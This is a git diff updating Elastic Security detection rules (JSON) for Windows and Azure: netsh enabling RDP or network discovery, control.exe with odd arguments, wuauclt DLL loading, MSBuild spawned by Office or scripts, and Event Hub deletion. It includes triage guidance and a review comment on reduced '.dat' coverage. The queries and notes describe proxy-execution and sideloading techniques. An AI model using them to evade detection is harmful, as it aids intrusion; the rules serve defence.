Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the\n`netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. 
Check whether the user should be performing this kind of activity, whether the user is aware\nof it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : (\"localport=3389\", \"RemoteDesktop\", \"group=\\\"remote desktop\\\"\") and\n process.args : (\"action=allow\", \"enable=Yes\", \"enable\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": 
"medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json index 7f56edc51c96a..d1268734ac0cb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json 
@@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Enable Host Network Discovery via Netsh", - "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems\nwith this setting enabled will communicate with other systems using broadcast messages, which can be used to identify\ntargets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems\nwith this setting enabled will communicate with other systems using broadcast messages, which can be used to identify\ntargets for lateral movement. 
This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\nprocess.name : \"netsh.exe\" and\nprocess.args : (\"firewall\", \"advfirewall\") and process.args : \"group=Network Discovery\" and process.args : \"enable=Yes\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json index 58cd10a68a612..1350d8b4f1572 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json @@ -14,15 +14,40 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Event Hub Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about", "https://azure.microsoft.com/en-in/services/event-hubs/", "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-features" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e0f36de1-0342-453d-95a9-a068b257b053", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json index 68e4718f79e17..11c5d99eb7d62 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json 
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Control Panel Process with Unusual Arguments", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.dat*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", "references": [ "https://www.joesandbox.com/analysis/476188/1/html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to 
add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -38,7 +56,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json index 00adb53d10e3b..56948ace764d0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json 
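Review bot: The rewritten `query` in this hunk drops `"*.dat*"` from the `process.command_line` pattern list, which quietly narrows coverage: a CPL payload dropped under a `.dat` name and handed to control.exe no longer matches, while the image-extension masquerades around it still do. Presumably the pattern was removed for false positives; if so, a narrower carve-out (e.g. `and not process.parent.name : "<noisy parent>"` or a path exclusion) keeps the detection while removing the noise. At minimum the removal deserves a sentence in `setup` or the description so operators know why the rule's scope changed between versions 3 and 5.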
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "ImageLoad via Windows Update Auto Update Client", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", "references": [ "https://dtm.uk/wuauclt/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -38,7 +61,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] @@ -48,5 +71,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json index 8da432218fd3c..6e7cf5add5ec1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json 
@@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started by an Office Application", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Started by an Office Application\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer.\nYou can create and edit documents containing text and images, work with data in spreadsheets and databases, and create\npresentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted\nfor initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML\nschema for a project file that controls how the build platform processes and builds software, and can be abused to proxy\nexecution of code.\n\nThis rule looks for the `Msbuild.exe` utility spawned by MS Office programs. This is generally the result of the\nexecution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file \nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"eqnedt32.exe\",\n \"excel.exe\",\n \"fltldr.exe\",\n \"msaccess.exe\",\n \"mspub.exe\",\n \"outlook.exe\",\n \"powerpnt.exe\",\n \"winword.exe\" )\n", "references": [ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, 
"rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json index 996ed0c3b9531..7dd1077d672e0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json 
@@ -15,10 +15,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started by a Script Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\") and\n process.parent.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json index 3cbcc0c2baf86..d0dc1752c36fa 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started by a System Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"explorer.exe\", \"wmiprvse.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json index a92e7949b45d5..48b0bc0b86814 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", 
@@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json index 368035727ff10..31729915f2480 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json 
@@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started an Unusual Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"MSBuild.exe\" and\n process.name : (\"csc.exe\", \"iexplore.exe\", \"powershell.exe\")\n", "references": [ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -56,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json index 4f7d4b166fecb..c2504f566d427 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential DLL SideLoading via Trusted Microsoft Programs", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.pe.original_file_name in (\"WinWord.exe\", \"EXPLORER.EXE\", \"w3wp.exe\", \"DISM.EXE\") and\n not (process.name : (\"winword.exe\", \"explorer.exe\", \"w3wp.exe\", \"Dism.exe\") or\n process.executable : (\"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files?(x86)\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\Dism.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Dism.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\")\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json
index 1291ede56e2aa..be185e83d99a6 100644
